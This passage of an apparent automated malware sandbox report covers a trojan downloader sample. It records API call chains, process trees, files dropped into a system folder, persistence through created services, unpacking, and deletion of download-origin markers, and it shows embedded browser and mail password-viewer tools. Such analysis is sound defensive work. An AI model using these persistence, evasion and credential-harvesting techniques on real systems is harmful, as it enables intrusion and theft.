                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,8_2_00413C19
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_004039E0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,LoadLibraryExA,LoadLibraryExA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,SizeofResource,LoadLibraryExA,atoi,atoi,atoi,GetCurrentProcess,VirtualAllocExNuma,#825,#825,0_2_004039E0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 1_3_02DB33F0 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeFile created: C:\Users\user\AppData\Local\Temp\6F0A.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCommand line argument: ~`@7_2_00405FD0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCommand line argument: ~`@7_2_00405FD0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCommand line argument: ~`@7_1_00405FD0
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\webservices\clb.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: clb.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: clb.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: clb.exe, 00000001.00000003.1361095704.00000000035B1000.00000004.00000001.sdmp, clb.exe, 00000008.00000002.1359416111.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: clb.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: clb.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: clb.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: clb.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe C:\Windows\SysWOW64\webservices\clb.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clboe.exe 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe C:\Windows\SysWOW64\webservices\clb.exeJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'Jump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'Jump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'Jump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clboe.exe 'C:\Windows\SysWOW64\webservices\clboe.exe' 'C:\Users\user\AppData\Local\Temp\6F0A.tmp'Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\RPCJump to behavior
                  Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: clb.exe
                  Source: Binary string: cmd.pdbUGP source: clb.exe, 00000001.00000003.1361352227.000000000364D000.00000004.00000001.sdmp, clboe.exe, 0000000A.00000000.1358615647.00007FF6585CE000.00000002.00020000.sdmp, clboe.exe.1.dr
                  Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: clb.exe
                  Source: Binary string: cmd.pdb source: clb.exe, 00000001.00000003.1361352227.000000000364D000.00000004.00000001.sdmp, clboe.exe, 0000000A.00000000.1358615647.00007FF6585CE000.00000002.00020000.sdmp, clboe.exe.1.dr

                  Data Obfuscation:

                  barindex
                  Detected unpacking (changes PE section rights)Show sources
                  Source: C:\Windows\SysWOW64\webservices\clb.exeUnpacked PE file: 7.2.clb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                  Source: C:\Windows\SysWOW64\webservices\clb.exeUnpacked PE file: 9.2.clb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Detected unpacking (overwrites its own PE header)Show sources
                  Source: C:\Windows\SysWOW64\webservices\clb.exeUnpacked PE file: 7.2.clb.exe.400000.0.unpack
                  Source: C:\Windows\SysWOW64\webservices\clb.exeUnpacked PE file: 9.2.clb.exe.400000.0.unpack
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
                  Source: clboe.exe.1.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeCode function: 0_2_00408070 push eax; ret 0_2_0040809E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 1_3_02DBBAC4 push FFFFFFB1h; ret 1_3_02DBBAD1
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 1_3_02DBC5F3 push FFFFFFB5h; ret 1_3_02DBC5FD
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 1_3_02DBDC43 push FFFFFFB5h; ret 1_3_02DBDC45
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004048C5 push ecx; ret 7_2_004048D8
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004048C5 push ecx; ret 7_1_004048D8
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00445190 push eax; ret 8_2_004451A4
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00445190 push eax; ret 8_2_004451CC
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00449EB4 push eax; ret 8_2_00449EC1
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00444F79 push ecx; ret 8_2_00444F89
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_00445190 push eax; ret 8_1_004451A4
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_00445190 push eax; ret 8_1_004451CC
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00412341 push ecx; ret 9_2_00412351
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00412360 push eax; ret 9_2_00412374
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00412360 push eax; ret 9_2_0041239C
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00412341 push ecx; ret 9_1_00412351
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00412360 push eax; ret 9_1_00412374
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00412360 push eax; ret 9_1_0041239C

                  Persistence and Installation Behavior:

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts themShow sources
                  Source: C:\Windows\SysWOW64\webservices\clb.exeExecutable created and started: C:\Windows\SysWOW64\webservices\clb.exeJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeExecutable created and started: C:\Windows\SysWOW64\webservices\clboe.exeJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeFile created: C:\Windows\SysWOW64\webservices\clboe.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\webservices\clb.exeFile created: C:\Windows\SysWOW64\webservices\clboe.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 1_3_02DB33F0 _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeFile opened: C:\Windows\SysWOW64\webservices\clb.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004038A5 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004038A5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior